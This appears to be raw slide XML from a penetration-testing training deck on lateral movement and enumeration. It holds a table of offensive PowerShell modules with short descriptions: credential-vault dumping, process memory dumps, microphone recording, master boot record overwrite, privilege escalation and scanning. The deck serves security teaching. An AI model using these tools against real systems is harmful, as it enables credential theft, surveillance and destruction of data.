                        <a:rPr lang="en-US" sz="1300" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:latin typeface="Arial"/>
                        </a:rPr>
                        <a:t>Creates a new volume shadow copy</a:t>
                      </a:r>
                      <a:endParaRPr lang="pt-BR">
                        <a:latin typeface="Arial"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1147115551"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr lvl="0">
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1300" b="1" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:latin typeface="Arial"/>
                        </a:rPr>
                        <a:t>Get-</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1300" b="1" i="0" u="none" strike="noStrike" noProof="0" err="1">
                          <a:latin typeface="Arial"/>
                        </a:rPr>
                        <a:t>VolumeShadowCopy</a:t>
                      </a:r>
                      <a:endParaRPr lang="pt-BR" b="1">
                        <a:latin typeface="Arial"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr lvl="0" algn="l">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1300" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:latin typeface="Arial"/>
                        </a:rPr>
                        <a:t>Lists the device paths of all local volume shadow copies</a:t>
                      </a:r>
                      <a:endParaRPr lang="pt-BR">
                        <a:latin typeface="Arial"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1734481702"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="370838">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr lvl="0">
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1300" b="1" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:latin typeface="Arial"/>
                        </a:rPr>
                        <a:t>Mount-</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1300" b="1" i="0" u="none" strike="noStrike" noProof="0" err="1">
                          <a:latin typeface="Arial"/>
                        </a:rPr>
                        <a:t>VolumeShadowCopy</a:t>
                      </a:r>
                      <a:endParaRPr lang="pt-BR" b="1">
                        <a:latin typeface="Arial"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr lvl="0" algn="l">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1300" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:latin typeface="Arial"/>
                        </a:rPr>
                        <a:t>Mounts a volume shadow copy</a:t>
                      </a:r>
                      <a:endParaRPr lang="pt-BR">
                        <a:latin typeface="Arial"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="4121892049"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="370838">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr lvl="0">
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1300" b="1" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:latin typeface="Arial"/>
                        </a:rPr>
                        <a:t>Remove-</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1300" b="1" i="0" u="none" strike="noStrike" noProof="0" err="1">
                          <a:latin typeface="Arial"/>
                        </a:rPr>
                        <a:t>VolumeShadowCopy</a:t>
                      </a:r>
                      <a:endParaRPr lang="pt-BR" b="1">
                        <a:latin typeface="Arial"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr lvl="0" algn="l">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1300" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:latin typeface="Arial"/>
                        </a:rPr>
                        <a:t>Deletes a volume shadow copy</a:t>
                      </a:r>
                      <a:endParaRPr lang="pt-BR" dirty="0">
                        <a:latin typeface="Arial"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="561724989"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="21663547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Understanding How to Perform Lateral Movement, Detection Avoidance, and Enumeration</a:t>
            </a:r>
            <a:endParaRPr lang="pt-BR"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text 0"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="100" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="274320"/>
            <a:ext cx="9144000" cy="386033"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Legitimate Utilities and Living-off-the-Land (Cont.)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Text 2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="925183"/>
            <a:ext cx="8786001" cy="2280608"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1400">
              <a:solidFill>
                <a:srgbClr val="181A1F"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:cs typeface="Calibri" panose="020F0502020204030204"/>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dirty="0"/>
              <a:t>43</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="7" name="Tabela 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DD3392BF-586B-1BAC-FBDC-29EF951C7768}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1602844487"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="75481" y="938122"/>
          <a:ext cx="8971622" cy="4054200"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr firstRow="1" bandRow="1">
                <a:tableStyleId>{5C22544A-7EE6-4342-B048-85BDC9FD1C3A}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="2530928">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1414830880"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="6440694">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1314350341"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="299357">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1300" noProof="0" dirty="0">
                          <a:latin typeface="Arial"/>
                        </a:rPr>
                        <a:t>Module/Script</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1300" noProof="0" dirty="0">
                          <a:latin typeface="Arial"/>
                        </a:rPr>
                        <a:t>Description</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3138939995"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr lvl="0">
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1300" b="1" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:latin typeface="Arial"/>
                        </a:rPr>
                        <a:t>Get-</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1300" b="1" i="0" u="none" strike="noStrike" noProof="0" dirty="0" err="1">
                          <a:latin typeface="Arial"/>
                        </a:rPr>
                        <a:t>VaultCredential</a:t>
                      </a:r>
                      <a:endParaRPr lang="pt-BR" b="1" dirty="0">
                        <a:latin typeface="Arial"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr lvl="0" algn="l">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1300" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:latin typeface="Arial"/>
                        </a:rPr>
                        <a:t>Displays Windows vault credential objects, including plaintext web credentials</a:t>
                      </a:r>
                      <a:endParaRPr lang="pt-BR">
                        <a:latin typeface="Arial"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3889016744"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="299357">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr lvl="0">
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1300" b="1" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:latin typeface="Arial"/>
                        </a:rPr>
                        <a:t>Out-Minidump</a:t>
                      </a:r>
                      <a:endParaRPr lang="pt-BR" b="1">
                        <a:latin typeface="Arial"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr lvl="0" algn="l">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1300" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:latin typeface="Arial"/>
                        </a:rPr>
                        <a:t>Generates a full-memory minidump of a process</a:t>
                      </a:r>
                      <a:endParaRPr lang="pt-BR">
                        <a:latin typeface="Arial"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3868594995"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr lvl="0">
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1300" b="1" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:latin typeface="Arial"/>
                        </a:rPr>
                        <a:t>Get-</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1300" b="1" i="0" u="none" strike="noStrike" noProof="0" dirty="0" err="1">
                          <a:latin typeface="Arial"/>
                        </a:rPr>
                        <a:t>MicrophoneAudio</a:t>
                      </a:r>
                      <a:endParaRPr lang="pt-BR" b="1" dirty="0">
                        <a:latin typeface="Arial"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr lvl="0">
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1300" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:latin typeface="Arial"/>
                        </a:rPr>
                        <a:t>Records audio from the system microphone and saves to disk</a:t>
                      </a:r>
                      <a:endParaRPr lang="pt-BR">
                        <a:latin typeface="Arial"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3816093248"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="326571">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr lvl="0">
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1300" b="1" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:latin typeface="Arial"/>
                        </a:rPr>
                        <a:t>Set-</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1300" b="1" i="0" u="none" strike="noStrike" noProof="0" dirty="0" err="1">
                          <a:latin typeface="Arial"/>
                        </a:rPr>
                        <a:t>MasterBootRecord</a:t>
                      </a:r>
                      <a:endParaRPr lang="pt-BR" b="1" dirty="0">
                        <a:latin typeface="Arial"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr lvl="0">
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1300" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:latin typeface="Arial"/>
                        </a:rPr>
                        <a:t>Overwrites the master boot record with the message of your choice</a:t>
                      </a:r>
                      <a:endParaRPr lang="pt-BR">
                        <a:latin typeface="Arial"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3433902618"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr lvl="0" algn="l">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1300" b="1" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:latin typeface="Arial"/>
                        </a:rPr>
                        <a:t>Set-</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1300" b="1" i="0" u="none" strike="noStrike" noProof="0" dirty="0" err="1">
                          <a:latin typeface="Arial"/>
                        </a:rPr>
                        <a:t>CriticalProcess</a:t>
                      </a:r>
                      <a:endParaRPr lang="pt-BR" b="1" dirty="0">
                        <a:latin typeface="Arial"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr lvl="0" algn="l">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1300" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:latin typeface="Arial"/>
                        </a:rPr>
                        <a:t>Causes your machine to blue screen upon exiting PowerShell</a:t>
                      </a:r>
                      <a:endParaRPr lang="pt-BR">
                        <a:latin typeface="Arial"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3909239564"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr lvl="0" algn="l">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1300" b="1" i="0" u="none" strike="noStrike" noProof="0" dirty="0" err="1">
                          <a:latin typeface="Arial"/>
                        </a:rPr>
                        <a:t>PowerUp</a:t>
                      </a:r>
                      <a:endParaRPr lang="pt-BR" b="1" dirty="0">
                        <a:latin typeface="Arial"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr lvl="0">
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1300" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:latin typeface="Arial"/>
                        </a:rPr>
                        <a:t>Acts as a clearinghouse of common privilege escalation checks, along with some weaponization vectors</a:t>
                      </a:r>
                      <a:endParaRPr lang="pt-BR">
                        <a:latin typeface="Arial"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1147115551"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr lvl="0">
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1300" b="1" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:latin typeface="Arial"/>
                        </a:rPr>
                        <a:t>Invoke-</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1300" b="1" i="0" u="none" strike="noStrike" noProof="0" dirty="0" err="1">
                          <a:latin typeface="Arial"/>
                        </a:rPr>
                        <a:t>Portscan</a:t>
                      </a:r>
                      <a:endParaRPr lang="pt-BR" b="1" dirty="0">
                        <a:latin typeface="Arial"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr lvl="0" algn="l">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1300" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:latin typeface="Arial"/>
                        </a:rPr>
                        <a:t>Does a single TCP port scan using regular sockets, based rather loosely on Nmap</a:t>
                      </a:r>
                      <a:endParaRPr lang="pt-BR">
                        <a:latin typeface="Arial"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1734481702"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="370838">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr lvl="0">
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1300" b="1" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:latin typeface="Arial"/>
                        </a:rPr>
                        <a:t>Get-</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1300" b="1" i="0" u="none" strike="noStrike" noProof="0" dirty="0" err="1">
                          <a:latin typeface="Arial"/>
                        </a:rPr>
                        <a:t>HttpStatus</a:t>
                      </a:r>
                      <a:endParaRPr lang="pt-BR" b="1" dirty="0">
                        <a:latin typeface="Arial"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr lvl="0" algn="l">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1300" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:latin typeface="Arial"/>
                        </a:rPr>
                        <a:t>Returns the HTTP status codes and full URL for specified paths when provided with a dictionary file</a:t>
                      </a:r>
                      <a:endParaRPr lang="pt-BR">
                        <a:latin typeface="Arial"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="4121892049"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="370838">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr lvl="0">
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1300" b="1" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:latin typeface="Arial"/>
                        </a:rPr>
                        <a:t>Invoke-</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1300" b="1" i="0" u="none" strike="noStrike" noProof="0" err="1">
                          <a:latin typeface="Arial"/>
                        </a:rPr>
                        <a:t>ReverseDnsLookup</a:t>
                      </a:r>
                      <a:endParaRPr lang="pt-BR" b="1">
                        <a:latin typeface="Arial"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr lvl="0" algn="l">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1300" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:latin typeface="Arial"/>
                        </a:rPr>
                        <a:t>Scans an IP address range for DNS PTR records</a:t>
                      </a:r>
                      <a:endParaRPr lang="pt-BR" dirty="0">
                        <a:latin typeface="Arial"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="561724989"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="299357">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr lvl="0">
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1300" b="1" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:latin typeface="Arial"/>
                        </a:rPr>
                        <a:t>PowerView</a:t>
                      </a:r>
                      <a:endParaRPr lang="pt-BR" b="1">
                        <a:latin typeface="Arial"/>
                      </a:endParaRPr>
